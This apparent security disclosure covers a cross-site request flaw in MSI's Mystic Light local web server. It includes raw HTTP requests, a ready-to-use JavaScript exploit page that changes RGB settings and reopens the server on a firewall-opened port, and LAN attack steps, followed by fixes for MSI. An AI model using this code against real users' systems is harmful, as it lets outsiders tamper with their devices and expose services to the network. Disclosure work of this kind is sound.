If you have the MSI Dragon Center software installed (or just the Mystic Light app), random websites can control the RGB lighting on your motherboard and graphics card!
The latest version of Mystic Light as of this writing (18.104.22.168) is affected.
Here are some example requests. This one returns information about the attached devices:

    GET /GetDeviceInfo HTTP/1.1
    Host: localhost:26820

This one applies the "Color Cycle" effect to the motherboard LEDs:

    GET /SetStyleID=112&DeviceIndex=0&DeviceType=MSI_MB HTTP/1.1
    Host: localhost:26820

And this one stops the HTTP server, deletes the old firewall rule, adds a new one for 1337/tcp, then restarts the server on 0.0.0.0:1337:

    GET /SetServerPort=1337 HTTP/1.1
    Host: localhost:26820
The server does whitelist localhost as the only acceptable hostname in the Host header. That means DNS rebinding probably won't work to bypass the same-origin policy and read responses (such as the GetDeviceInfo output) from a malicious browser origin, since a rebound request would carry the attacker's hostname in Host. The check does nothing against a page that simply targets http://localhost:26820 directly, though, because the browser fills in Host: localhost:26820 itself.
However, an attacker doesn't need to read any responses to change your RGB settings. Every endpoint the server supports is a plain GET with no custom headers, which makes them CORS "simple" requests: the browser sends them without a preflight no matter which origin they come from, and the server acts on them whether or not the page is allowed to read the reply. Hence, this web page.
Note that the same attack works from the LAN by issuing the requests to TARGET_IP:26820 (with the Host header set to localhost by hand, since that header is the only thing the server checks), because the firewall rule opens the port and the server listens on all interfaces.
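The attacking page described above, as an added example that is not the original page's PoC code. It issues the three requests quoted earlier from a browser as CORS "simple" requests, and includes a checker for what counts as "simple" under the Fetch rules so you can see why no preflight protects the server. The base URL http://localhost:26820 and the endpoint paths are taken from this page; the helper names are mine.

```javascript
// Added example (not the original page's PoC code): the three requests quoted
// on this page, issued from a browser page as CORS "simple" requests.
// Assumes the Mystic Light Web API Server is reachable at http://localhost:26820.
const MYSTIC_LIGHT = "http://localhost:26820";

// Endpoints quoted on this page. They are all plain GETs with no custom
// headers, so the browser never sends a preflight for them.
function buildRequests(base = MYSTIC_LIGHT) {
  return [
    `${base}/GetDeviceInfo`,
    `${base}/SetStyleID=112&DeviceIndex=0&DeviceType=MSI_MB`,
    `${base}/SetServerPort=1337`,
  ];
}

// CORS-safelisted ("simple") request check following the Fetch spec rules:
// method GET/HEAD/POST, only safelisted header names, and for Content-Type
// only the three form-style MIME types. Anything else triggers a preflight,
// which a server that sends no CORS headers would fail.
const SAFE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

function isSimpleRequest(method, headers = {}) {
  if (!SAFE_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFE_HEADERS.has(lower)) return false;
    if (lower === "content-type") {
      const mime = value.split(";")[0].trim().toLowerCase();
      if (!SAFE_CONTENT_TYPES.has(mime)) return false;
    }
  }
  return true;
}

// Fire the requests from the attacking page. mode "no-cors" tells the browser
// we never intend to read the response; the request still goes on the wire and
// the server acts on it. Returns what was attempted so a caller (or a test with
// a fake fetch) can inspect the order; a thrown fetch means the port was refused,
// the server was not running, or the browser blocked the request.
async function fireAll(urls, fetchImpl = globalThis.fetch) {
  const attempted = [];
  for (const url of urls) {
    let sent = true;
    try {
      await fetchImpl(url, { mode: "no-cors", credentials: "omit" });
    } catch (err) {
      sent = false;
    }
    attempted.push({ url, sent });
  }
  return attempted;
}

// A second delivery vehicle that also avoids preflight: plain <img> tags.
// Only meaningful in a browser, so it is a no-op without a document.
function fireViaImages(urls, doc = globalThis.document) {
  if (!doc) return 0;
  for (const url of urls) {
    const img = doc.createElement("img");
    img.src = url;
  }
  return urls.length;
}
```

Drop this in a `<script>` on any page and call `fireAll(buildRequests())`; the LEDs change even though every response is opaque to the page. From the LAN the same three URLs can be sent with any HTTP client against TARGET_IP:26820, provided the client sets the Host header to localhost by hand, since the server's whitelist inspects only that header. Newer Chromium builds add Private Network Access checks for requests from public sites to localhost, which may block this vehicle, but the point stands: nothing in CORS itself stops a simple request from being delivered.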
MSI can fix the malicious-website attack by validating the Origin header of requests to its Mystic Light Web API Server. Note that this only helps if requests without an Origin header are also treated as untrusted, because a browser omits Origin on plain GETs issued through an <img> or <script> tag; checking Sec-Fetch-Site as well closes that gap in modern browsers.
MSI should also add an authentication mechanism, or at least bind the server to 127.0.0.1 only, to stop unauthorized users on the LAN from driving the server.